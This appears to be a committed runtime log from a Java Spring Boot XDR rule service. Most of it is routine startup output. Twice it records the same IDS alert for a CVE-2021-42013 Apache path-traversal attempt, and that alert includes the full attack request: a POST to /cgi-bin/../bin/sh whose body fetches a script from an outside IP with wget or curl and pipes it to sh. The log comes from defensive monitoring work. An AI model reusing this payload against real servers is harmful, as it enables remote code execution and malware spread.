2026-05-19 12:40:52.332 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 458 ms. Found 1 Elasticsearch repository interfaces.
|
||||
2026-05-19 12:40:52.338 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 12:40:52.338 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
|
||||
2026-05-19 12:40:52.444 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
|
||||
2026-05-19 12:40:52.444 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 105 ms. Found 0 Reactive Elasticsearch repository interfaces.
|
||||
2026-05-19 12:40:52.456 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 12:40:52.457 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
|
||||
2026-05-19 12:40:52.573 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
|
||||
2026-05-19 12:40:52.573 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 107 ms. Found 0 Redis repository interfaces.
|
||||
2026-05-19 12:40:53.277 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8289 (http)
|
||||
2026-05-19 12:40:53.285 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8289"]
|
||||
2026-05-19 12:40:53.286 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
|
||||
2026-05-19 12:40:53.286 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
|
||||
2026-05-19 12:40:53.472 [main] INFO o.a.c.c.C.[.[localhost].[/xdrrule] - Initializing Spring embedded WebApplicationContext
|
||||
2026-05-19 12:40:53.472 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 3810 ms
|
||||
2026-05-19 12:40:53.520 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogRuleApplication.dmColumnService
|
||||
2026-05-19 12:40:56.662 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
|
||||
2026-05-19 12:40:57.019 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
|
||||
2026-05-19 12:40:57.028 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
|
||||
2026-05-19 12:40:57.044 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
|
||||
2026-05-19 12:40:57.047 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
|
||||
2026-05-19 12:40:57.093 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
|
||||
2026-05-19 12:41:02.982 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
|
||||
2026-05-19 12:41:03.688 [main] INFO com.common.util.MyBatisUtil - MyBatis 初始化成功
|
||||
2026-05-19 12:41:04.562 [main] INFO org.quartz.impl.StdSchedulerFactory - Using default implementation for ThreadExecutor
|
||||
2026-05-19 12:41:04.574 [main] INFO o.quartz.core.SchedulerSignalerImpl - Initialized Scheduler Signaller of type: class org.quartz.core.SchedulerSignalerImpl
|
||||
2026-05-19 12:41:04.574 [main] INFO org.quartz.core.QuartzScheduler - Quartz Scheduler v.2.3.2 created.
|
||||
2026-05-19 12:41:04.575 [main] INFO org.quartz.simpl.RAMJobStore - RAMJobStore initialized.
|
||||
2026-05-19 12:41:04.576 [main] INFO org.quartz.core.QuartzScheduler - Scheduler meta-data: Quartz Scheduler (v2.3.2) 'quartzScheduler' with instanceId 'NON_CLUSTERED'
|
||||
Scheduler class: 'org.quartz.core.QuartzScheduler' - running locally.
|
||||
NOT STARTED.
|
||||
Currently in standby mode.
|
||||
Number of jobs executed: 0
|
||||
Using thread pool 'org.quartz.simpl.SimpleThreadPool' - with 10 threads.
|
||||
Using job-store 'org.quartz.simpl.RAMJobStore' - which does not support persistence. and is not clustered.
|
||||
|
||||
2026-05-19 12:41:04.576 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler 'quartzScheduler' initialized from an externally provided properties instance.
|
||||
2026-05-19 12:41:04.576 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler version: 2.3.2
|
||||
2026-05-19 12:41:04.576 [main] INFO org.quartz.core.QuartzScheduler - JobFactory set to: org.springframework.scheduling.quartz.SpringBeanJobFactory@22726bc7
|
||||
2026-05-19 12:41:04.790 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
|
||||
2026-05-19 12:41:04.790 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
|
||||
2026-05-19 12:41:04.790 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779165664788
|
||||
2026-05-19 12:41:04.811 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
|
||||
2026-05-19 12:41:04.812 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
|
||||
2026-05-19 12:41:04.812 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779165664811
|
||||
2026-05-19 12:41:04.814 [main] INFO o.a.coyote.http11.Http11NioProtocol - Starting ProtocolHandler ["http-nio-8289"]
|
||||
2026-05-19 12:41:04.831 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat started on port(s): 8289 (http) with context path '/xdrrule'
|
||||
2026-05-19 12:41:04.833 [main] INFO o.s.s.quartz.SchedulerFactoryBean - Starting Quartz Scheduler now
|
||||
2026-05-19 12:41:04.834 [main] INFO org.quartz.core.QuartzScheduler - Scheduler quartzScheduler_$_NON_CLUSTERED started.
|
||||
2026-05-19 12:41:04.848 [main] INFO com.syslogRuleApplication - Started syslogRuleApplication in 15.717 seconds (JVM running for 19.644)
|
||||
2026-05-19 12:41:05.211 [org.springframework.kafka.KafkaListenerEndpointContainer#0-1-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - agent-syslog-group: partitions assigned: []
|
||||
2026-05-19 12:41:05.255 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - agent-syslog-group: partitions assigned: [agent-syslog-topic-0]
|
||||
2026-05-19 12:49:22.611 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO c.Modules.NormalData.SysLogProcessor - 开始处理批次消息,数量: 1
|
||||
2026-05-19 12:49:23.521 [log-processor-1] INFO c.Modules.NormalData.SysLogProcessor - 收到syslogmessage:[receive_time=20260519124920569 device_id=103 device_name=公司开发内部测试探针 vendor=null data_type=json device_collect_id=1]<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"????", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"????APT??????????????????", "deviceProductType":"????????", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"?й?", "srcGeoRegion":"???", "srcGeoCity":"???", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"?й?", "destGeoRegion":"???", "destGeoCity":"???", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 ·???????? (CVE-2021-42013)", "alarmType":"WEB????->·??????", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 ·???????? (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 ·???????? (CVE-2021-42013). ?????192.168.101.1/41614, ????192.168.101.173/80"}
|
||||
2026-05-19 12:49:28.534 [log-processor-1] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer-rule - Starting...
|
||||
2026-05-19 12:49:29.193 [log-processor-1] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer-rule - Start completed.
|
||||
2026-05-19 12:49:29.660 [log-processor-1] WARN c.c.service.LogDataFilterService - 泛化规则-数据过滤规则为空,默认不处理!
|
||||
2026-05-19 12:49:30.119 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO c.Modules.NormalData.SysLogProcessor - 批次处理完成,总数: 1
|
||||
2026-05-19 12:53:33.743 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
|
||||
2026-05-19 12:53:33.741 [main] INFO com.syslogRuleApplication - Starting syslogRuleApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 32804 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer-rule\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
|
||||
2026-05-19 12:53:33.746 [main] INFO com.syslogRuleApplication - No active profile set, falling back to 1 default profile: "default"
|
||||
2026-05-19 12:53:36.246 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 12:53:36.249 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
|
||||
2026-05-19 12:53:36.820 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 565 ms. Found 1 Elasticsearch repository interfaces.
|
||||
2026-05-19 12:53:36.826 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 12:53:36.827 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
|
||||
2026-05-19 12:53:36.940 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
|
||||
2026-05-19 12:53:36.940 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 113 ms. Found 0 Reactive Elasticsearch repository interfaces.
|
||||
2026-05-19 12:53:36.952 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 12:53:36.953 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
|
||||
2026-05-19 12:53:37.082 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
|
||||
2026-05-19 12:53:37.082 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 120 ms. Found 0 Redis repository interfaces.
|
||||
2026-05-19 12:53:37.856 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8289 (http)
|
||||
2026-05-19 12:53:37.865 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8289"]
|
||||
2026-05-19 12:53:37.866 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
|
||||
2026-05-19 12:53:37.867 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
|
||||
2026-05-19 12:53:38.072 [main] INFO o.a.c.c.C.[.[localhost].[/xdrrule] - Initializing Spring embedded WebApplicationContext
|
||||
2026-05-19 12:53:38.072 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 4241 ms
|
||||
2026-05-19 12:53:38.131 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogRuleApplication.dmColumnService
|
||||
2026-05-19 12:53:42.124 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
|
||||
2026-05-19 12:53:42.604 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
|
||||
2026-05-19 12:53:42.616 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
|
||||
2026-05-19 12:53:42.633 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
|
||||
2026-05-19 12:53:42.637 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
|
||||
2026-05-19 12:53:42.691 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
|
||||
2026-05-19 12:53:50.667 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
|
||||
2026-05-19 12:53:51.641 [main] INFO com.common.util.MyBatisUtil - MyBatis 初始化成功
|
||||
2026-05-19 12:53:52.684 [main] INFO org.quartz.impl.StdSchedulerFactory - Using default implementation for ThreadExecutor
|
||||
2026-05-19 12:53:52.702 [main] INFO o.quartz.core.SchedulerSignalerImpl - Initialized Scheduler Signaller of type: class org.quartz.core.SchedulerSignalerImpl
|
||||
2026-05-19 12:53:52.702 [main] INFO org.quartz.core.QuartzScheduler - Quartz Scheduler v.2.3.2 created.
|
||||
2026-05-19 12:53:52.704 [main] INFO org.quartz.simpl.RAMJobStore - RAMJobStore initialized.
|
||||
2026-05-19 12:53:52.705 [main] INFO org.quartz.core.QuartzScheduler - Scheduler meta-data: Quartz Scheduler (v2.3.2) 'quartzScheduler' with instanceId 'NON_CLUSTERED'
|
||||
Scheduler class: 'org.quartz.core.QuartzScheduler' - running locally.
|
||||
NOT STARTED.
|
||||
Currently in standby mode.
|
||||
Number of jobs executed: 0
|
||||
Using thread pool 'org.quartz.simpl.SimpleThreadPool' - with 10 threads.
|
||||
Using job-store 'org.quartz.simpl.RAMJobStore' - which does not support persistence. and is not clustered.
|
||||
|
||||
2026-05-19 12:53:52.705 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler 'quartzScheduler' initialized from an externally provided properties instance.
|
||||
2026-05-19 12:53:52.705 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler version: 2.3.2
|
||||
2026-05-19 12:53:52.705 [main] INFO org.quartz.core.QuartzScheduler - JobFactory set to: org.springframework.scheduling.quartz.SpringBeanJobFactory@3b68a50c
|
||||
2026-05-19 12:53:53.059 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
|
||||
2026-05-19 12:53:53.059 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
|
||||
2026-05-19 12:53:53.059 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779166433056
|
||||
2026-05-19 12:53:53.086 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
|
||||
2026-05-19 12:53:53.086 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
|
||||
2026-05-19 12:53:53.087 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779166433086
|
||||
2026-05-19 12:53:53.089 [main] INFO o.a.coyote.http11.Http11NioProtocol - Starting ProtocolHandler ["http-nio-8289"]
|
||||
2026-05-19 12:53:53.108 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat started on port(s): 8289 (http) with context path '/xdrrule'
|
||||
2026-05-19 12:53:53.110 [main] INFO o.s.s.quartz.SchedulerFactoryBean - Starting Quartz Scheduler now
|
||||
2026-05-19 12:53:53.110 [main] INFO org.quartz.core.QuartzScheduler - Scheduler quartzScheduler_$_NON_CLUSTERED started.
|
||||
2026-05-19 12:53:53.129 [main] INFO com.syslogRuleApplication - Started syslogRuleApplication in 19.974 seconds (JVM running for 26.357)
|
||||
2026-05-19 12:53:53.549 [org.springframework.kafka.KafkaListenerEndpointContainer#0-1-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - agent-syslog-group: partitions assigned: []
|
||||
2026-05-19 12:53:53.570 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - agent-syslog-group: partitions assigned: [agent-syslog-topic-0]
|
||||
2026-05-19 13:00:27.858 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO c.Modules.NormalData.SysLogProcessor - 开始处理批次消息,数量: 1
|
||||
2026-05-19 13:00:28.956 [log-processor-1] INFO c.Modules.NormalData.SysLogProcessor - 收到syslogmessage:[receive_time=20260519130026107 device_id=103 device_name=公司开发内部测试探针 vendor=null data_type=json device_collect_id=1]<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"????", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"????APT??????????????????", "deviceProductType":"????????", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"?й?", "srcGeoRegion":"???", "srcGeoCity":"???", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"?й?", "destGeoRegion":"???", "destGeoCity":"???", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 ·???????? (CVE-2021-42013)", "alarmType":"WEB????->·??????", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 ·???????? (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 ·???????? (CVE-2021-42013). ?????192.168.101.1/41614, ????192.168.101.173/80"}
|
||||
2026-05-19 13:00:35.554 [log-processor-1] WARN c.c.service.LogDataFilterService - 泛化规则-数据过滤规则为空,默认不处理!
|
||||
2026-05-19 13:00:35.629 [log-processor-1] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer-rule - Starting...
|
||||
2026-05-19 13:00:36.294 [log-processor-1] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer-rule - Start completed.
|
||||
2026-05-19 13:00:36.641 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO c.Modules.NormalData.SysLogProcessor - 批次处理完成,总数: 1
|
||||
Reference in New Issue
Block a user